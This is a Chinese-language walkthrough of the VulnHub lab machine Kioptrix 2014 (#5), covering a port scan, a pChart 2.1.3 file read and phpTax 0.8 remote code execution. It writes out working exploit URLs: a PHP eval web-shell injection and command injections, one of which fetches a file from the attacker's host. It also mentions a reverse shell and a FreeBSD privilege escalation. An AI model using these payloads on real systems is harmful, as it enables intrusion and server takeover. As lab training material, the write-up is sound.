考点: user-agent,rce,lfi
靶机链接: https://www.vulnhub.com/entry/kioptrix-2014-5,62/
环境配置 #
| 名称 | IP |
|---|---|
| Kali Linux | 192.168.88.135 |
| KIOPTRIX: 2014 (#5) | 192.168.88.148 |
初步打点 #
端口扫描 #
$ export rip=192.168.88.148
$ sudo nmap -v -A -p- $rip
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
|_http-server-header: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8
| http-methods:
|_ Supported Methods: POST
8080/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
|_http-server-header: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8
|_http-title: 403 Forbidden
WEB测试 #
80 #
pChart2.1.3 #
参考 Exploiting pChart 2.1.3 (Directory traversal & XSS)
任意文件读取
读取apache配置
8080 #
firefox添加扩展,自定义user-agent
发现phptax
获得权限 #
思路一 #
参考 PhpTax 0.8 - File Manipulation ’newvalue’ / Remote Code Execution
http://192.168.88.148:8080/phptax/index.php?field=123.php&newvalue=<?php eval($_REQUEST[123])?>
思路二 #
参考 phptax 0.8 - Remote Code Execution
http://192.168.88.148:8080/phptax/index.php?pfilez=1040pg1.tob;%20ps%20-aux%3E/tmp/1;&pdf=make
然后利用pChart2.1.3的任意文件读取查看执行结果
尝试nc反弹失败
nc是残版
尝试wget、curl均执行失败,使用 fetch下载文件成功
http://192.168.88.148:8080/phptax/index.php?pfilez=1040pg1.tob;%20%20fetch%20http://192.168.88.135/cmd.php%3E%20/tmp/1;&pdf=make
提权 #
上传phpspy.php
反弹shell
参考 FreeBSD 9.0 < 9.1 - ‘mmap/ptrace’ Local Privilege Escalation
